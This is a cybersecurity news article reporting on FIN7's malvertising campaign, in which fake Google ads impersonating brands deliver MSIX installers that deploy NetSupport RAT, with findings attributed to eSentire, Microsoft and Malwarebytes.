Cyber security news for all


    FIN7 Hacker Group Exploits Malicious Google Ads to Distribute NetSupport RAT

    The financially motivated threat group known as FIN7 has been observed using deceptive Google ads, impersonating legitimate brands, to deliver MSIX installers that ultimately deploy the NetSupport RAT.

    According to a report by cybersecurity firm eSentire, the threat actors have created malicious websites mimicking well-known brands like AnyDesk, WinSCP, BlackRock, Asana, Concur, The Wall Street Journal, Workable, and Google Meet.

    FIN7, also known as Carbon Spider and Sangria Tempest, has been active since 2013, initially focusing on stealing payment data from point-of-sale (PoS) devices before shifting to targeting large firms through ransomware campaigns.

    The group has evolved its tactics over the years, using various custom malware families such as BIRDWATCH, Carbanak, DICELOADER (also known as Lizar and Tirion), POWERPLANT, POWERTRASH, and TERMITE.

    While FIN7 traditionally relied on spear-phishing, they have recently turned to malvertising techniques, as noted by Microsoft in December 2023, when they observed the group using Google ads to distribute malicious MSIX application packages, leading to the execution of the POWERTRASH dropper and the deployment of NetSupport RAT and Gracewire.

    Microsoft’s response to the abuse of MSIX as a malware distribution method was to disable the protocol handler by default.

    In April 2024, eSentire detected FIN7’s malicious ads prompting users to download a fake browser extension, actually an MSIX file containing a PowerShell script. This script gathers system information and contacts a remote server to fetch another encoded PowerShell script, which is used to download and execute the NetSupport RAT.

    Additionally, eSentire found that FIN7 used the NetSupport RAT to deliver further malware, including DICELOADER via a Python script.

    The use of trusted brand names and deceptive web ads by FIN7 to distribute malware underscores the ongoing threat, particularly with the exploitation of signed MSIX files, which bypass security mechanisms like Microsoft Defender SmartScreen.

    Similar findings were reported by Malwarebytes, which observed malicious ads mimicking brands such as Asana, BlackRock, CNN, Google Meet, SAP, and The Wall Street Journal, targeting corporate users.

    This revelation coincides with a SocGholish (aka FakeUpdates) infection wave targeting business partners, indicating a broader interest in exploiting business relationships.

    Furthermore, there has been a separate malware campaign targeting Windows and Microsoft Office users, spreading RATs and cryptocurrency miners through cracks for popular software, as reported by Symantec.

    Recent Articles

    Related Stories